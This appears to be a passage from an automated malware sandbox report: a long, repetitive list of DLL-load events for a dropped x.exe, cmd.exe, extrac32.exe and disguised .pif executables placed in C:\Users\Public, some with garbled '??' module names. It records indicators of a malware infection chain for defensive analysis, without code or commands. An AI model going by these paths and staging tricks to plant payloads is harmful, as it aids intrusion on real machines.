          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ????.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: tquery.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppwmi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppcext.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winscard.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: wldp.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: amsi.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: userenv.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: profapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: version.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: rasman.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: secur32.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: schannel.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\Public\ndpha.pifSection loaded: zipfldr.dllJump to behavior
          Source: C:\Users\Public\ndpha.pifSection loaded: propsys.dllJump to behavior
          Source: C:\Users\Public\ndpha.pifSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\Public\ndpha.pifSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\Public\ndpha.pifSection loaded: wldp.dllJump to behavior
          Source: C:\Users\Public\ndpha.pifSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: version.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: url.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: userenv.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: netutils.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: wldp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: propsys.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: amsi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: winmm.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: wininet.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: profapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: sppc.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
